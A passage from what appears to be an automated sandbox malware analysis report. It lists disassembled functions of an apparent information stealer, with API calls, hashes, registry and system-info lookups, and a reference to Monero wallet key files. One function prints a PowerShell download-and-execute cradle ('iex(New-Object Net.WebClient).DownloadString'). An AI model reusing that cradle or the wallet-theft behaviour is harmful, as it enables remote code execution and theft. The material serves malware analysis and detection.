                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00695011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00695041
                        • InternetCloseHandle.WININET(?), ref: 006950B9
                        • InternetCloseHandle.WININET(?), ref: 006950C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: d3a1d3765695ac08486d51204a4b7a6411f082ce538bd1cb8d82702758526bd7
                        • Instruction ID: 56c671bd55e547ec4f5a3c752b1fc6683988122d1131f7d8507720b6ad1cf211
                        • Opcode Fuzzy Hash: d3a1d3765695ac08486d51204a4b7a6411f082ce538bd1cb8d82702758526bd7
                        • Instruction Fuzzy Hash: 4B3107B4A00218ABDB24DF54DC85BDDB7B9FB48704F2081D9EA09A7280C7706EC58F99
                        Function 006A8100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0126F328,00000000,?,006B0E2C,00000000,?,00000000), ref: 006A8130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A8137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 006A8158
                        • wsprintfA.USER32 ref: 006A81AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2922868504-3474575989
                        • Opcode ID: 4fb6d7e0ecec8312623218b8156bb20cfcde37c7bbc9818019c2e6b306fdf88d
                        • Instruction ID: 605e15297609a5c875208ad69b228240cc208edcc15799d1bdc6d0a37641974b
                        • Opcode Fuzzy Hash: 4fb6d7e0ecec8312623218b8156bb20cfcde37c7bbc9818019c2e6b306fdf88d
                        • Instruction Fuzzy Hash: 7E213EB1E44218ABDB04DFD4CC49FAEB7B9FB45700F204619F605BB280D77859018BA5
                        Function 006A83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006A8426
                        • wsprintfA.USER32 ref: 006A8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 006A847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 006A848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 006A8499
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                        • RegQueryValueExA.ADVAPI32(00000000,0126F1D8,00000000,000F003F,?,00000400), ref: 006A84EC
                        • lstrlen.KERNEL32(?), ref: 006A8501
                        • RegQueryValueExA.ADVAPI32(00000000,0126F3D0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,006B0B34), ref: 006A8599
                        • RegCloseKey.ADVAPI32(00000000), ref: 006A8608
                        • RegCloseKey.ADVAPI32(00000000), ref: 006A861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: 8478a1890e73e11f8940969b311ba1ff6d7c07319c22447b53d58b75ed52ca57
                        • Instruction ID: b1af3d04a59c19f12e0f728aae7494639a94d19474fa96d982f8216720bfb077
                        • Opcode Fuzzy Hash: 8478a1890e73e11f8940969b311ba1ff6d7c07319c22447b53d58b75ed52ca57
                        • Instruction Fuzzy Hash: A3210AB19012189FDB68DB54DC85FE9B7B9FB48700F10C199E60996140DF71AE85CFD4
                        Function 006A7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A76A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A76AB
                        • RegOpenKeyExA.ADVAPI32(80000002,0125C138,00000000,00020119,00000000), ref: 006A76DD
                        • RegQueryValueExA.ADVAPI32(00000000,0126F478,00000000,00000000,?,000000FF), ref: 006A76FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 006A7708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: a86b7ce6f9af7e21b04d3c0cd63d099f5f64e09bd15f6e1220a5a8c91a40aa0b
                        • Instruction ID: 88fc5fa67054846b9f33120d83a2612d5a5b64bcb71a355b302ef9abf83a141a
                        • Opcode Fuzzy Hash: a86b7ce6f9af7e21b04d3c0cd63d099f5f64e09bd15f6e1220a5a8c91a40aa0b
                        • Instruction Fuzzy Hash: C9014FB5A45204BBEB04EBE4DC49FAEB7B9FB48701F204155FA04A7290D67099009F51
                        Function 006A7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A773B
                        • RegOpenKeyExA.ADVAPI32(80000002,0125C138,00000000,00020119,006A76B9), ref: 006A775B
                        • RegQueryValueExA.ADVAPI32(006A76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 006A777A
                        • RegCloseKey.ADVAPI32(006A76B9), ref: 006A7784
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: 425181f93f701a33c73e7899eae0ed600f1ee4b82947e6fc12d140f2f7938073
                        • Instruction ID: cad26b8189b524b72071b478516a7b74045f5b2b71fb5e484219a4d261cce944
                        • Opcode Fuzzy Hash: 425181f93f701a33c73e7899eae0ed600f1ee4b82947e6fc12d140f2f7938073
                        • Instruction Fuzzy Hash: 9C0144B5A40308BBD704DBE4DC49FAEB7B8FB44701F104559FA05A7281D67059408F51
                        Function 006A92E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(:j,80000000,00000003,00000000,00000003,00000080,00000000,?,006A3AEE,?), ref: 006A92FC
                        • GetFileSizeEx.KERNEL32(000000FF,:j), ref: 006A9319
                        • CloseHandle.KERNEL32(000000FF), ref: 006A9327
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID: :j$:j
                        • API String ID: 1378416451-347553651
                        • Opcode ID: f14f4b465b63443dbfa492e9c63d0989d4fdb5415f319714bdcf1792122d6816
                        • Instruction ID: eed8ce2e51409e7d854d9e29382bb14c7c08169a2e68e806ad6ffcf711911981
                        • Opcode Fuzzy Hash: f14f4b465b63443dbfa492e9c63d0989d4fdb5415f319714bdcf1792122d6816
                        • Instruction Fuzzy Hash: F9F03C35E40208BBDF14EBB0DC49B9E77FABB49711F20C294B651A72C0DA719A018F50
                        Function 006999C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,0069148F,00000000), ref: 00699A5A
                        • LocalFree.KERNEL32(0069148F), ref: 00699A90
                        • CloseHandle.KERNEL32(000000FF), ref: 00699A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 590a49903bd483b56ab03ef9d38fdc4d8ffcb869a4c5b39fe70d937b2f4c0aae
                        • Instruction ID: 374a7525219daaa603970d033f96fe29f3dace69886ff5ff1bd48f848da10ecb
                        • Opcode Fuzzy Hash: 590a49903bd483b56ab03ef9d38fdc4d8ffcb869a4c5b39fe70d937b2f4c0aae
                        • Instruction Fuzzy Hash: 3031E2B4A00209EFDF14CF94C885BEE77BAFF48350F208159E911A7290D779AA41CFA1
                        Function 006A4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcat.KERNEL32(?,0126F580), ref: 006A47DB
                          • Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006A8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 006A4801
                        • lstrcat.KERNEL32(?,?), ref: 006A4820
                        • lstrcat.KERNEL32(?,?), ref: 006A4834
                        • lstrcat.KERNEL32(?,0125B738), ref: 006A4847
                        • lstrcat.KERNEL32(?,?), ref: 006A485B
                        • lstrcat.KERNEL32(?,0126E910), ref: 006A486F
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006A8D90: GetFileAttributesA.KERNEL32(00000000,?,00691B54,?,?,006B564C,?,?,006B0E1F), ref: 006A8D9F
                          • Part of subcall function 006A4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006A4580
                          • Part of subcall function 006A4570: RtlAllocateHeap.NTDLL(00000000), ref: 006A4587
                          • Part of subcall function 006A4570: wsprintfA.USER32 ref: 006A45A6
                          • Part of subcall function 006A4570: FindFirstFileA.KERNEL32(?,?), ref: 006A45BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: 046175a15adfe31770b03ab34227475eca4d89e782eb98e0196f056acb89f7dc
                        • Instruction ID: 3d280ff7fd9180266fe08f2ed242d1c97ce89f9ac49564f189284b726d08dbf8
                        • Opcode Fuzzy Hash: 046175a15adfe31770b03ab34227475eca4d89e782eb98e0196f056acb89f7dc
                        • Instruction Fuzzy Hash: 17317FB2D00208ABCB54FBB0DC85EEA737DBB49700F40459DB71996091EE749B89CF99
                        Function 006A2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006A2D85
                        Strings
                        • ')", xrefs: 006A2CB3
                        • <, xrefs: 006A2D39
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 006A2CC4
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 006A2D04
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: a5062ac8c867b54bb3f7fc3dd26bf6a9dfbc17e5f24e3540ab8f96a183ec5422
                        • Instruction ID: b6a478bae377998d061eb281bb9a49fa8a93ab58f9926382d4f58b8b806fbbfa
                        • Opcode Fuzzy Hash: a5062ac8c867b54bb3f7fc3dd26bf6a9dfbc17e5f24e3540ab8f96a183ec5422
                        • Instruction Fuzzy Hash: 4641DE71D102089ADB94FFE0C891BEEBB76AF15300F50411EE106A7192DF746E8ACF95
                        Function 00699E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                        Download Yara Rule
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00699F41
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
